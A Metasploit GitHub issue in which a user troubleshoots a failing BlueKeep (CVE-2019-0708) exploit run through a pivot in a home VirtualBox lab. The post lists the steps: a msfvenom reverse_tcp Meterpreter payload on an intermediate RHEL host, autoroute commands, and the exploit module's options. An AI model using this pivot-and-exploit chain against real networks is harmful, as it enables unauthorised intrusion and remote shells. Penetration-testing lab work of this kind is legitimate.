search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.14k stars 13.98k forks source link

Meterpreter session crashes running CVE_2019_0708 module #14688

Closed crackaboi closed 3 years ago

crackaboi commented 3 years ago

I am using Virtualbox, and am trying to hack into a Windows 7 Ultimate Edition SP1 using Metasploit module windows/rdp/cve_2019_0708_bluekeep_rce. I have made it so the Win7 is vulnerable to the module by allowing remote connections, thus opening RDP port 3398

CVE details: https://nvd.nist.gov/vuln/detail/CVE-2019-0708 Module details: https://www.rapid7.com/db/modules/exploit/windows/rdp/cve_2019_0708_bluekeep_rce/

My Kali Machine (IP: 1.1.1.2 Subnet: 1.1.1.1/30, External) RHEL Machine (IP: 10.0.0.209 Subnet: 10.0.0.1/24, DMZ) Win7 Target (IP: 192.168.0.198 Subnet: 192.168.0.193/29, Internal)

Kali can ping RHEL only, and only RHEL can ping Win7, so need to Meterpreter to RHEL and autoroute before I can Meterpreter into Win7

First, I use msfvenom to generate a linux/x86/meterpreter/reverse_tcp payload and deliver it to the RHEL machine (RHEL is x86_64), gaining a meterpreter session to that machine. I use run autoroute -s 10.0.0.1/24

Then I use run autoroute -s 192.168.0.193/29.

I background the Meterpreter session then run the BlueKeep module. I set the following for the options:

RHOSTS: 192.168.0.198
RPORT: 3398 (Port 3398 is open in Win7)
Payload: windows/meterpreter/reverse_tcp (I tried using/x64 too, no difference)
Target: 2 (2 specifies target is Windows 7 SP1 on VirtualBox 6, which it is)
LHOST: 1.1.1.2
LPORT: 4444
groomsize: 20

I get the following error: Exploit failed: IOError stream closed in another thread

After trying to exploit a few times, the meterpreter session I have established with the RHEL machine also gets closed with Reason: Died

I also tried doing this exploit with the Kali and Win7 in the same network (so RHEL not needed, and thus no pivoting), and it worked fine, so it seems like its an issue with the pivoting rather than configurations on the Win7 machine.

Neither the RHEL or the Win7 crashed as well during any point.

Any assistance is greatly appreciated! Thank you!

gwillcox-r7 commented 3 years ago

Updated explanation for clarity, mainly around code highlighting.

Student-Jasons commented 3 years ago

Try installing it once, it's the last way and the best way

crackaboi commented 3 years ago

Try installing it once, it's the last way and the best

Installing what exactly?

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 3 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.